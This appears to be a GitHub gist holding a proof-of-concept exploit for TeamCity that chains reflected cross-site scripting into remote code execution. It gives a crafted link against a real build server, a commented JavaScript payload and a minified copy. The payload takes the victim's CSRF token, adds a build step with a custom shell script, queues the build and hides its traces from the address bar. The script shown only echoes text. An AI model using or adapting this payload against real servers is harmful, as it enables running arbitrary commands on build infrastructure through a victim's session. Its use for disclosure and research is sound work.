Last active
December 19, 2019 21:33
-
-
Save karanlyons/cfd63ba1de3be290736190ba4dc59aae to your computer and use it in GitHub Desktop.
TeamCity XSS RCE PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://builds.gradle.org/project.html?projectId=GradleProfiler&tab=problems%27%7D)%3B%7D)()%3B((w%2Cd%2Ch%2Cx%2Cn)%3D%3E%7Bw.p%7C%7C(w.p%3D1%2Cw.onerror%3D()%3D%3E1%2Cw.addEventListener(%22DOMContentLoaded%22%2C()%3D%3E%7Bw.history.replaceState(0%2Cd.title%2Ch.slice(0%2Ch.indexOf(%22%2527%22)))%3Bvar%20t%3Dd.querySelector(%22.tc-csrf-token-input%22).value%2Ce%3Dx(%60%2Fadmin%2FeditRunType.html%3Fid%3DbuildType%253A%24%7Bn%7D%26runnerId%3D__NEW_RUNNER__%26submitBuildType%3Dstore%60)%3Be.onloadend%3D()%3D%3E%7Bvar%20a%3Dx(%22%2Fajax.html%22)%3Ba.setRequestHeader(%22X-TC-CSRF-Token%22%2Ct)%3Ba.send(%60add2Queue%3D%24%7Bn%7D%26validate%3Dtrue%26redirectTo%60)%3B%7D%3Be.send(%60runTypeInfoKey%3DsimpleRunner%26buildStepName%3DRCE%2BDemo%26prop%253Ateamcity.step.mode%3Ddefault%26prop%253Ause.custom.script%3Dtrue%26prop%253Ascript.content%3Decho%2B%2522RCE%2Bvia%2BXSS%2522%26submitButton%3DSave%26tc-csrf-token%3D%24%7Bt%7D%60)%7D))%7D)(window%2Cdocument%2Clocation.href%2Cp%3D%3E%7Bvar%20x%3Dnew%20XMLHttpRequest()%3Bx.open(%22POST%22%2Cp%2C1)%3Bx.setRequestHeader(%22Content-Type%22%2C%22application%2Fx-www-form-urlencoded%22)%3Breturn%20x%7D%2C%22Temporally_ArtifactProducer%22)%3C%2Fscript%3E%3Cscript%3E%2F* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Use an IIFE for scoping and to save bytes on variable declarations and make some values | |
| * easier to alter. | |
| */ | |
| ((window, document, href, buildXHR, projectName, buildStepName, payload) => { | |
| // Prevent running multiple times, as we're reflected multiple times. | |
| if (window.payloadDropped) { return; } else { window.payloadDropped = 1; } | |
| /* | |
| * Suppress console errors from unmatched character pairs since we can't cleanly | |
| * handle all cases. | |
| */ | |
| window.onerror = () => true; | |
| window.addEventListener("DOMContentLoaded", () => { | |
| // Remove our XSS payload from the address bar and history. | |
| window.history.replaceState( | |
| 0, | |
| document.title, | |
| href.slice(0, href.indexOf("%27")) | |
| ); | |
| const CSRFToken = document.querySelector(".tc-csrf-token-input").value; | |
| // Create new job. | |
| const editRunType = buildXHR( | |
| `/admin/editRunType.html?` | |
| + `id=buildType%3A${projectName}` | |
| + `&runnerId=__NEW_RUNNER__` | |
| + `&submitBuildType=store` | |
| ); | |
| editRunType.onloadend = () => { | |
| // Add job to queue. | |
| const ajax = buildXHR("/ajax.html"); | |
| ajax.setRequestHeader("X-TC-CSRF-Token", token); | |
| ajax.send( | |
| `add2Queue=${projectName}` | |
| + `&validate=true&redirectTo` | |
| ); | |
| }; | |
| editRunType.send( | |
| `runTypeInfoKey=simpleRunner` | |
| + `&buildStepName=${buildStepName}` | |
| + `&prop%3Ateamcity.step.mode=default` | |
| + `&prop%3Ause.custom.script=true` | |
| + `&prop%3Ascript.content=${payload}` | |
| + `&submitButton=Save` | |
| + `&tc-csrf-token=${CSRFToken}` | |
| ); | |
| }); | |
| })( | |
| window, | |
| document, | |
| location.href, | |
| // buildXHR | |
| path => { | |
| const xhr = new XMLHttpRequest(); | |
| xhr.open("POST", path, true); | |
| xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); | |
| return xhr; | |
| }, | |
| // projectName (urlencoded & form-urlencoded; avoid spaces) | |
| encodeURIComponent("Temporally_ArtifactProducer"), | |
| // buildStepName (form-urlencoded) | |
| encodeURIComponent("RCE Demo").replace(/%20/g, "+"), | |
| // payload (form-urlencoded) | |
| encodeURIComponent('echo "RCE via XSS"').replace(/%20/g, "+"), | |
| ); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ((w,d,h,x,n)=>{w.p||(w.p=1,w.onerror=()=>1,w.addEventListener("DOMContentLoaded",()=>{w.history.replaceState(0,d.title,h.slice(0,h.indexOf("%27")));var t=d.querySelector(".tc-csrf-token-input").value,e=x(`/admin/editRunType.html?id=buildType%3A${n}&runnerId=__NEW_RUNNER__&submitBuildType=store`);e.onloadend=()=>{var a=x("/ajax.html");a.setRequestHeader("X-TC-CSRF-Token",t);a.send(`add2Queue=${n}&validate=true&redirectTo`);};e.send(`runTypeInfoKey=simpleRunner&buildStepName=RCE+Demo&prop%3Ateamcity.step.mode=default&prop%3Ause.custom.script=true&prop%3Ascript.content=echo+%22RCE+via+XSS%22&submitButton=Save&tc-csrf-token=${t}`)}))})(window,document,location.href,p=>{var x=new XMLHttpRequest();x.open("POST",p,1);x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");return x},"Temporally_ArtifactProducer") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment